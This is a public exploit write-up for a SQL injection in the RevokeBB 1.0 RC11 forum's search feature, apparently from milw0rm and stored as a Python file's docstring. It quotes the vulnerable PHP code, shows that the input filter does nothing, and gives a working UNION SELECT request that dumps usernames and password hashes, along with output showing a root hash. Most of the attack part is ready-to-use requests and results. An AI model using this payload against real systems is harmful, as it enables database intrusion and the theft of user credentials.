111 lines
No EOL
5.8 KiB
Python
Executable file
111 lines
No EOL
5.8 KiB
Python
Executable file
#!/usr/bin/python
|
|
"""
|
|
#=================================================================================================#
|
|
# ____ __________ __ ____ __ #
|
|
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
|
|
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
|
|
# | | | \ | |/ \ \___| | /_____/ | || | #
|
|
# |___|___| /\__| /______ /\___ >__| |___||__| #
|
|
# \/\______| \/ \/ #
|
|
#=================================================================================================#
|
|
# This is a public Exploit #
|
|
#=================================================================================================#
|
|
# RevokeBB 1.0 RC11 #
|
|
# Sql Injection Vulnerability #
|
|
#====================================#===========#====================================#===========#
|
|
# Server Configuration Requirements # # Some Information # #
|
|
#====================================# #====================================# #
|
|
# # #
|
|
# # Vendor: sourceforge.net/projects/revokebb/ #
|
|
# # Author: The:Paradox #
|
|
# Nothing! # Severity: Critical #
|
|
# # #
|
|
# # Proud To Be Italian. #
|
|
# # #
|
|
#====================================#===========#================================================#
|
|
# Proof Of Concept / Bug Explanation # #
|
|
#====================================# #
|
|
# RevokeBB presents a critical vulnerability in the "Search System". Let's see sources: #
|
|
#=================================================================================================#
|
|
|
|
[./inc/acts/search.module.php]
|
|
|
|
85. $search_string = $this->var_filtrer->String('search');
|
|
|
|
141. $search->fast_thread_search($search_string, $start, 15);
|
|
|
|
[./inc/class_search.php]
|
|
|
|
83. function fast_thread_search($string, $start, $stop)
|
|
84. {
|
|
85. if($start > '0')
|
|
86. $str = ($start - 1)*$stop;
|
|
87. else
|
|
88. $str = 0;
|
|
89.
|
|
90. //$string = $this->prepare_sstring($string);
|
|
91.
|
|
92.
|
|
93. $query = $this->db->execQuery($this->prepare_query('revokebb_posts.text', $string, 0, array($str, $stop) ));
|
|
|
|
#=================================================================================================#
|
|
# Ok, we have a sql query with $search_string. Seems it has been cleaned by var_filtrer(), #
|
|
# but don't trust function names =D. Let's have a look? #
|
|
#=================================================================================================#
|
|
|
|
[./inc/class_var_filtrer]
|
|
|
|
41. function var_filtrer()
|
|
42. {
|
|
43. //$this->add($var);
|
|
44.
|
|
45. }
|
|
|
|
#=================================================================================================#
|
|
# What? An empty function??? This function does really nothing :D ... But that's not all. #
|
|
# Let's see String() function. #
|
|
#=================================================================================================#
|
|
|
|
[./inc/class_var_filtrer]
|
|
|
|
74. function String($name, $let_html=1)
|
|
75. {
|
|
76. if(!isset($this->variable[$name]))
|
|
77. return '';
|
|
78.
|
|
79. $this->variable[$name]=stripslashes(trim($this->variable[$name]));
|
|
80.
|
|
81. if($let_html!=1)
|
|
82. $this->variable[$name]=strip_tags($this->variable[$name]);
|
|
83.
|
|
84. /*$this->variable[$name]=htmlspecialchars($this->variable[$name], ENT_QUOTES);*/
|
|
85.
|
|
86. $this->variable[$name]=htmlentities($this->variable[$name]);
|
|
87.
|
|
88. $this->variable[$name] = preg_replace("/\\\(?!&#|\?#)/", "\", $this->variable[$name]);
|
|
89.
|
|
90. return trim($this->variable[$name]);
|
|
91. }
|
|
|
|
#=================================================================================================#
|
|
# See, $name is stripslashed :D That's all, Sql injection vulnerability Magic Quotes Indipendent. #
|
|
# Let's have a try. #
|
|
#=================================================================================================#
|
|
|
|
GET http://localhost/RevokeBB/?search=%25%27pwnz00red
|
|
|
|
Fatal error: database::query() Could not execute: You have an error in your SQL syntax;
|
|
check the manual that corresponds to your MySQL server version for the right syntax to use
|
|
near 'pwnz00red%' GROUP BY revokebb_threads.thread_id LIMIT 0,15' at line 7
|
|
|
|
GET http://localhost/RevokeBB/?search=|The:Paradox|%25%27/**/union/**/select/**/1,2,3,4,5,6,concat(user_nick,0x3a,user_password),8,9,10,11,12,13,14,15,16,17,18/**/from/**/revokebb_users/**/where/**/user_id=1/*
|
|
|
|
Title Author Replies Visits Last post
|
|
2 root:42f3f2bd1a74120fb585a894aa13b31a 10 13 01-01-1970 00:00:09
|
|
4
|
|
#=================================================================================================#
|
|
# Use these informations at your own risk. You are responsible for your own deeds. #
|
|
#=================================================================================================#
|
|
"""
|
|
|
|
# milw0rm.com [2008-05-27] |